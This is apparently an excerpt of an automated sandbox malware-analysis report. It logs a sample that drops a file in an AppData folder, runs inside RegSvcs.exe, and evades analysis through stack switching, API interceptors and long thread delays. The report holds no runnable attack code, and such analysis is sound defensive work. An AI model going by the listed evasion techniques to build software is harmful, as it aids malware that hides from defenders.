Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	API/Special instruction interceptor: Address: 12B3294
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	API/Special instruction interceptor: Address: 1703294

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599431	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599308	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599201	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599089	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598785	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598497	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598387	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597696	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597337	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595858	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595524	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595416	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595304	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594557	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594436	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594211	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599871	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598947	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598770	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598101	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597973	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595389	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595163	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595044	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594935	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594706	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593250	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6892	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: foregroundWindowGot 1726	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 3779	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6029	Jump to behavior

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_3-105989

Source: C:\Users\user\Desktop\drRbNknjyb.exe	API coverage: 4.9 %
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	API coverage: 5.3 %

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0445A GetFileAttributesW,FindFirstFileW,FindClose,	3_2_00E0445A
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0C6D1 FindFirstFileW,FindClose,	3_2_00E0C6D1
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	3_2_00E0C75C
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00E0EF95
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00E0F0F2
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_00E0F3F3
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_00E037EF
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E03B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_00E03B12
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_00E0BCBC
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050445A GetFileAttributesW,FindFirstFileW,FindClose,	6_2_0050445A
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050C6D1 FindFirstFileW,FindClose,	6_2_0050C6D1
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	6_2_0050C75C
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_0050EF95
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_0050F0F2
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_0050F3F3
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_005037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_005037EF
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_00503B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00503B12
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_0050BCBC

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00DA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_00DA49A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599431	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599308	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599201	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599089	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598785	Jump to behavior
